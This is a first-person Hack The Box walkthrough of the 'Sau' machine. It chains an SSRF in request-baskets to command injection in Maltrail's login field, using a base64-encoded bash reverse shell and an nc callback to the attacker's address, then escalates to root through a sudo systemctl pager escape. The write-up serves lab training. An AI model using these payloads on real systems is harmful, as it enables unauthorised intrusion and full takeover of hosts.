This is how I pwned Sau.
Initial Foothold
IP Address
10.129.248.192 - HTB Machine
10.10.16.9 - Attacker Machine
Open Ports
22
80
8338
55555
Nmap Scan
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 aa8867d7133d083a8ace9dc4ddf3e1ed (RSA)
| 256 ec2eb105872a0c7db149876495dc8a21 (ECDSA)
|_ 256 b30c47fba2f212ccce0b58820e504336 (ED25519)
80/tcp filtered http
8338/tcp filtered unknown
55555/tcp open unknown
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| X-Content-Type-Options: nosniff
| Date: Mon, 10 Jul 2023 07:33:08 GMT
| Content-Length: 75
| invalid basket name; the name does not match pattern: ^[wd-_\.]{1,250}$
| GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 302 Found
| Content-Type: text/html; charset=utf-8
| Location: /web
| Date: Mon, 10 Jul 2023 07:32:27 GMT
| Content-Length: 27
| href="/web">Found</a>.
| HTTPOptions:
| HTTP/1.0 200 OK
| Allow: GET, OPTIONS
| Date: Mon, 10 Jul 2023 07:32:30 GMT
|_ Content-Length: 0
Port 80 and 8338 cannot be access through browser.
Now accessing the /web on port 55555, and checking if the version of request-baskets is vulnerable
http://10.129.248.192:55555/web
Powered by request-baskets | Version: 1.2.1
https://github.com/darklynx/request-baskets
Road to User
CVE-2023-27163 - SSRF
https://gist.github.com/b33t1e/3079c10c88cad379fb166c389ce3b7b3
[Affected Component]
The API endpoints
/api/baskets/{name},/baskets/{name}are vulnerable to unauthenticated Server-Side Request Forgery (SSRF) attacks via theforward_urlparameter.
[Attack Vectors]
POC:
POST /api/baskets/{name} API with payload - {"forward_url": "http://127.0.0.1:80/test","proxy_response": false,"insecure_tls": false,"expand_path": true,"capacity": 250}Details can be seen: https://notes.sjtu.edu.cn/s/MUUhEymt7
SSRF Vector
POST /api/baskets/{name}
[...]
{
"forward_url": "http://10.10.16.9:9001/",
"proxy_response": false,
"insecure_tls": false,
"expand_path": true,
"capacity": 250
}
Following the CVE-2023-27163. This just returns the response to a netcat listener and cannot execute shell commands.
Further enumeration
It is important to remember what attacks can you do using SSRF; and port scanning is one of it.
Earlier the port 80 and 8338 are cannot be accessed. Trying the ports in the attack vector.
POST /api/baskets/rei3 HTTP/1.1
Host: 10.129.248.192:55555
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: 2wGpGuQz4Uy4gqgz7xGv7Ib6PokvYkKkF9GA9exP-k71
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://10.129.248.192
Content-Type: application/x-www-form-urlencoded
Content-Length: 132
{
"forward_url": "http://127.0.0.1:8338", # Localhost
"proxy_response": true, # Must be true
"insecure_tls": true,
"expand_path": true,
"capacity": 250
}
Note that proxy_response must be true to view the response when accessed.
After forwarding the response of http://localhost:8338 to the basket in http://10.129.248.192:55555/rei3 it can now be viewed by accessing the url.
Checking it again if the version is vulnerable.
http://10.129.248.192:55555/rei3
Maltrail (v0.53)
Finding user creds
Unauthenticated OS Command Injection in stamparm/maltrail in stamparm/maltrail https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/
Proof of Concept
curl 'http://hostname:8338/login' --data 'username=;`id > /tmp/bbq`'
It’s time to use the exploit.
curl 'http://10.129.248.192:55555/rei3/login' --data 'username=;`id`'
> Using `id` returns Login Failed
Checking if the command is working
curl 'http://10.129.248.192:55555/rei3/login' --data 'username=;`nc 10.10.16.9 80`'
> It connects to my netcat listener.
Crafting a reverse shell is tricky, after many tries, realizing it needs to be encoded.
/bin/bash -i >& /dev/tcp/10.10.16.9/9001 0>&1
# Encode the rev shell to Base64
L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE2LjkvOTAwMSAwPiYx
# Payload to be inserted in the username
echo "L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE2LjkvOTAwMSAwPiYx"|base64 -d|bash
> It needs to be decoded inside.
# Executing the exploit
curl 'http://10.129.248.192:55555/rei3/login' --data 'username=;`echo "L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE2LjkvOTAwMSAwPiYx"|base64 -d|bash`'
User.txt
Now we have access to user puma.
puma@sau:/opt/maltrail$ ls ~
ls ~
user.txt
puma@sau:/opt/maltrail$ cat ~/user.txt
cat ~/user.txt
[REDACTED-FLAG]
Path to Power (Gaining Administrator Access)
Skipping other enumeration.
Checking what the user puma can do.
puma@sau:/opt/maltrail$ sudo -l
sudo -l
Matching Defaults entries for puma on sau:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User puma may run the following commands on sau:
(ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service
Puma can use sudo through:
puma@sau:/opt/maltrail$ sudo /usr/bin/systemctl status trail.service
sudo /usr/bin/systemctl status trail.service
● trail.service - Maltrail. Server of malicious traffic detection system
Loaded: loaded (/etc/systemd/system/trail.service; enabled; vendor preset: enabled)
Active: active (running) since Mon 2023-07-10 16:38:56 UTC; 1 day 10h ago
Docs: https://github.com/stamparm/maltrail#readme
https://github.com/stamparm/maltrail/wiki
Main PID: 867 (python3)
Tasks: 8 (limit: 4662)
Memory: 20.6M
CGroup: /system.slice/trail.service
├─ 867 /usr/bin/python3 server.py
├─3969 /bin/sh -c logger -p auth.info -t "maltrail[867]" "Failed password for ;`echo "L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE2LjkvOTAwMSAwPiYx"|base64 -d|bash` from 127.0.0.1 port 40982"
├─3970 /bin/sh -c logger -p auth.info -t "maltrail[867]" "Failed password for ;`echo "L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE2LjkvOTAwMSAwPiYx"|base64 -d|bash` from 127.0.0.1 port 40982"
├─3973 bash
├─3974 /bin/bash -i
├─3990 sudo /usr/bin/systemctl status trail.service
└─3992 /usr/bin/systemctl status trail.service
Jul 12 03:12:38 sau maltrail[3874]: Failed password for ; from 127.0.0.1 port 41318
Jul 12 03:13:02 sau maltrail[3888]: Failed password for ; from 127.0.0.1 port 41982
Jul 12 03:13:13 sau maltrail[3902]: Failed password for ; from 127.0.0.1 port 56598
Jul 12 03:13:38 sau maltrail[3918]: Failed password for ; from 127.0.0.1 port 37932
Jul 12 03:13:56 sau maltrail[3933]: Failed password for ; from 127.0.0.1 port 44900
Jul 12 03:18:04 sau maltrail[3950]: Failed password for ; from 127.0.0.1 port 52552
Jul 12 03:18:15 sau maltrail[3964]: Failed password for ; from 127.0.0.1 port 50450
Jul 12 03:26:14 sau sudo[3988]: puma : TTY=unknown ; PWD=/opt/maltrail ; USER=root ; COMMAND=list
Jul 12 03:27:01 sau sudo[3990]: puma : TTY=unknown ; PWD=/opt/maltrail ; USER=root ; COMMAND=/usr/bin/systemctl status trail.service
Jul 12 03:27:01 sau sudo[3990]: pam_unix(sudo:session): session opened for user root by (uid=0)
At first I thought I need to overwrite the server.py that is being executed by the service, but the user puma cannot write to the directory/file nor stop the service.
Getting a shell
Spawning a shell
script /dev/null -c bash
sudo /usr/bin/systemctl status trail.service
!sh
Root.txt
# cat /root/root.txt
cat /root/root.txt
[REDACTED-FLAG]
That’s how I pwned Sau.
Achievement:
https://www.hackthebox.com/achievement/machine/743510/551